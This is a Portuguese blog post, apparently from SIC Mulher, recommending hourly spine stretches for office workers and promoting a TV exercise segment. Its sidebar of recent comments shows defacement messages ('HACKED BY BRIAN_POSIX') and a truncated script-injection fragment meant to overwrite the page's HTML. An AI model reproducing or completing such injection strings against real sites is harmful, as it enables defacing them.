Em Forma com Club L @ 18:32

Sex, 18/01/13

Sabia que ao Alongar a sua coluna irá melhorar?

Pois é, os Alongamentos são algo fundamental no nosso dia-a-dia e devemos faze-los logo pela manha quando acordamos, espreguiçar bem!
O espreguiçar não é nada mais nada menos que um alongamento generalizado que o nosso corpo pede de forma inconsciente. Por adaptações durante o sono dormimos muito tempo na mesma posição e, normalmente, encolhidos, o que faz com que ao acordarmos sintamos necessidade de esticar.

Pois bem, se durante o sono quando estamos muito tempo deitados/parados necessitamos de alongar, é sinal que, por esta lógica, se estivermos muito tempo na mesma posição, por exemplo sentados a trabalhar, também devamos ter essa mesma necessidade. E é verdade!

Devemos alongar, espreguiçar e descomprimir a nossa coluna a toda e qualquer hora do dia.
O nosso organismo não foi feito para estar nem 8 nem 12h parado, é como uma máquina e portanto precisa de manutenção e de ser trabalhado.

Se é uma das pessoas que após um dia de trabalho sente dores nas costas, tensão no pescoço, braços/pernas dormentes ou até falha de força quando quer sentar-se/levantar-se da cadeira, então esta rubrica é mesmo dedicada a si.

Não perca, aprenda alguns truques que pode até fazer enquanto trabalha e melhor, pode até ajudar o colega do lado que tanto se farta de queixar.

Melhore a sua postura, alongue de hora a hora e, certamente, terá uma vida mais tranquila e uma coluna tão saudável que já nem pensava ser possível.


O Club L mostrar-lhe-á alguns exercícios no Mais Mulher desta segunda-feira, às 17:30 na SIC Mulher!

 

Veja o vídeo aqui!


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO